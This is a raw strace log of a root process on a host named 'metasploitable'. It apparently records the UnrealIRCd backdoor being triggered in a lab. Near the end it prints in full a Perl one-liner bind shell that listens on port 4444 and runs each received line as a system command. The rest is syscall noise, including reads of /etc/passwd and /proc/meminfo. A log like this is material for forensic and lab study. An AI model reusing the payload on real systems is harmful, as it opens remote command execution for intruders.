12014 20:22:38.307756 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d5d000
12014 20:22:38.307768 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d5d6b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
12014 20:22:38.307825 mprotect(0xb7ea7000, 4096, PROT_READ) = 0
12014 20:22:38.307862 munmap(0xb7ee2000, 29913) = 0
12014 20:22:38.307898 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
12014 20:22:38.307915 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)
12014 20:22:38.307935 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfd8c750) = -1 ENOTTY (Inappropriate ioctl for device)
12014 20:22:38.307967 brk(0)            = 0x80f9000
12014 20:22:38.307976 brk(0x80fa000)    = 0x80fa000
12014 20:22:38.307989 brk(0x80fb000)    = 0x80fb000
12014 20:22:38.308005 getuid32()        = 0
12014 20:22:38.308015 getgid32()        = 0
12014 20:22:38.308024 geteuid32()       = 0
12014 20:22:38.308033 getegid32()       = 0
12014 20:22:38.308047 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
12014 20:22:38.308060 time(NULL)        = 1495671758
12014 20:22:38.308073 brk(0x80fc000)    = 0x80fc000
12014 20:22:38.308088 brk(0x80fd000)    = 0x80fd000
12014 20:22:38.308108 open("/proc/meminfo", O_RDONLY) = 1
12014 20:22:38.308129 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0
12014 20:22:38.308148 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ee9000
12014 20:22:38.308160 read(1, "MemTotal:      1035240 kB\nMemFree:        160728 kB\nBuffers:        141520 kB\nCached:         489652 kB\nSwapCached:          0 kB\nActive:         513760 kB\nInactive:       306288 kB\nHighTotal:      131008 kB\nHighFree:          248 kB\nLowTotal:       904232 kB\nLowFree:        160480 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:             296 kB\nWriteback:           0 kB\nAnonPages:      188856 kB\nMapped:          52016 kB\nSlab:            32640 kB\nSReclaimable:    20200 kB\nSUnreclaim:      12440 kB\nPageTables:       2904 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   707968 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846
12014 20:22:38.308254 close(1)          = 0
12014 20:22:38.308265 munmap(0xb7ee9000, 4096) = 0
12014 20:22:38.308277 brk(0x80fe000)    = 0x80fe000
12014 20:22:38.308304 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0
12014 20:22:38.308317 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0
12014 20:22:38.308329 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
12014 20:22:38.308341 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
12014 20:22:38.308353 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0
12014 20:22:38.308365 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0
12014 20:22:38.308379 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
12014 20:22:38.308473 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
12014 20:22:38.308488 uname({sys="Linux", node="metasploitable", ...}) = 0
12014 20:22:38.308537 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
12014 20:22:38.308555 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
12014 20:22:38.308574 brk(0x8100000)    = 0x8100000
12014 20:22:38.308586 getcwd("/etc/unreal", 4096) = 12
12014 20:22:38.308601 getpid()          = 12014
12014 20:22:38.308618 getppid()         = 4519
12014 20:22:38.308634 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
12014 20:22:38.308654 stat64("/sbin/sh", 0xbfd8c728) = -1 ENOENT (No such file or directory)
12014 20:22:38.308667 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0
12014 20:22:38.308684 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0
12014 20:22:38.308708 socket(PF_FILE, SOCK_STREAM, 0) = 1
12014 20:22:38.308722 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0
12014 20:22:38.308734 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
12014 20:22:38.308755 close(1)          = 0
12014 20:22:38.308767 socket(PF_FILE, SOCK_STREAM, 0) = 1
12014 20:22:38.308777 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0
12014 20:22:38.308788 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)
12014 20:22:38.308806 close(1)          = 0
12014 20:22:38.308820 open("/etc/nsswitch.conf", O_RDONLY) = 1
12014 20:22:38.308835 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0
12014 20:22:38.308851 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ee9000
12014 20:22:38.308862 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475
12014 20:22:38.308912 read(1, "", 4096) = 0
12014 20:22:38.308923 close(1)          = 0
12014 20:22:38.308932 munmap(0xb7ee9000, 4096) = 0
12014 20:22:38.308948 open("/etc/ld.so.cache", O_RDONLY) = 1
12014 20:22:38.308970 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
12014 20:22:38.308987 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7ee2000
12014 20:22:38.308998 close(1)          = 0
12014 20:22:38.309009 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12014 20:22:38.309023 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1
12014 20:22:38.309039 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512
12014 20:22:38.309132 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0
12014 20:22:38.309150 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d54000
12014 20:22:38.309161 mmap2(0xb7d5b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7d5b000
12014 20:22:38.309179 close(1)          = 0
12014 20:22:38.309191 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12014 20:22:38.309204 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1
12014 20:22:38.309218 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512
12014 20:22:38.309306 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0
12014 20:22:38.309323 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d3c000
12014 20:22:38.309334 mmap2(0xb7d50000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7d50000
12014 20:22:38.309350 mmap2(0xb7d52000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d52000
12014 20:22:38.309365 close(1)          = 0
12014 20:22:38.309391 munmap(0xb7ee2000, 29913) = 0
12014 20:22:38.309409 open("/etc/ld.so.cache", O_RDONLY) = 1
12014 20:22:38.309421 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0
12014 20:22:38.309438 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7ee2000
12014 20:22:38.309448 close(1)          = 0
12014 20:22:38.309467 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12014 20:22:38.309519 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1
12014 20:22:38.309533 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512
12014 20:22:38.309628 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0
12014 20:22:38.309646 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d32000
12014 20:22:38.309658 mmap2(0xb7d3a000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d3a000
12014 20:22:38.309675 close(1)          = 0
12014 20:22:38.309687 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12014 20:22:38.309701 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1
12014 20:22:38.309715 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512
12014 20:22:38.309805 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0
12014 20:22:38.309822 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d27000
12014 20:22:38.309833 mmap2(0xb7d30000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d30000
12014 20:22:38.309850 close(1)          = 0
12014 20:22:38.309871 munmap(0xb7ee2000, 29913) = 0
12014 20:22:38.309886 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1
12014 20:22:38.309901 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)
12014 20:22:38.309912 _llseek(1, 0, [0], SEEK_CUR) = 0
12014 20:22:38.309924 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0
12014 20:22:38.309941 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7ee9000
12014 20:22:38.309959 _llseek(1, 1624, [1624], SEEK_SET) = 0
12014 20:22:38.310004 munmap(0xb7ee9000, 1624) = 0
12014 20:22:38.310014 close(1)          = 0
12014 20:22:38.310058 getpgrp()         = 3831
12014 20:22:38.310068 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0
12014 20:22:38.310083 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0
12014 20:22:38.310100 brk(0x8101000)    = 0x8101000
12014 20:22:38.310132 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
12014 20:22:38.310147 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
12014 20:22:38.310161 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0
12014 20:22:38.310199 brk(0x8102000)    = 0x8102000
12014 20:22:38.310226 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
12014 20:22:38.310245 stat64("/sbin/AB", 0xbfd8c3e8) = -1 ENOENT (No such file or directory)
12014 20:22:38.310258 stat64("/bin/AB", 0xbfd8c3e8) = -1 ENOENT (No such file or directory)
12014 20:22:38.310269 stat64("/usr/sbin/AB", 0xbfd8c3e8) = -1 ENOENT (No such file or directory)
12014 20:22:38.310281 stat64("/usr/bin/AB", 0xbfd8c3e8) = -1 ENOENT (No such file or directory)
12014 20:22:38.310299 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
12014 20:22:38.310314 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d5d6f8) = 12015
12015 20:22:38.310362 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
12015 20:22:38.310379 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
12015 20:22:38.310393 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
12015 20:22:38.310405 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
12015 20:22:38.310421 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
12015 20:22:38.310437 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
12015 20:22:38.310458 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0
12015 20:22:38.310518 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)
12015 20:22:38.310532 --- SIGPIPE (Broken pipe) @ 0 (0) ---
12015 20:22:38.310603 exit_group(127)   = ?
12014 20:22:38.356640 rt_sigprocmask(SIG_SETMASK, [],  <unfinished ...>
4519  20:22:38.356665 waitpid(12014,  <unfinished ...>
12014 20:22:38.356677 <... rt_sigprocmask resumed> NULL, 8) = 0
12014 20:22:38.405517 --- SIGCHLD (Child exited) @ 0 (0) ---
12014 20:22:38.405546 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 12015
12014 20:22:38.405572 waitpid(-1, 0xbfd8c068, WNOHANG) = -1 ECHILD (No child processes)
12014 20:22:38.405584 sigreturn()       = ? (mask now [])
12014 20:22:38.405609 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
12014 20:22:38.405625 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
12014 20:22:38.405636 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0
12014 20:22:38.405648 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0
12014 20:22:38.405668 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
12014 20:22:38.405679 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0
12014 20:22:38.405724 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0
12014 20:22:38.405745 stat64("/sbin/perl", 0xbfd8c418) = -1 ENOENT (No such file or directory)
12014 20:22:38.405758 stat64("/bin/perl", 0xbfd8c418) = -1 ENOENT (No such file or directory)
12014 20:22:38.405770 stat64("/usr/sbin/perl", 0xbfd8c418) = -1 ENOENT (No such file or directory)
12014 20:22:38.405782 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0
12014 20:22:38.405800 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0
12014 20:22:38.405826 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0
12014 20:22:38.405842 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d5d6f8) = 12016
12016 20:22:38.555972 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0
12016 20:22:38.555972 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0
12016 20:22:38.555973 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0
12016 20:22:38.555973 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0
12016 20:22:38.555973 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0
12016 20:22:38.555973 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0
12016 20:22:38.555973 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0
12016 20:22:38.555974 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0
12016 20:22:38.555976 brk(0)            = 0x8153000
12016 20:22:38.555999 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
12016 20:22:38.556016 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f7b000
12016 20:22:38.556044 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
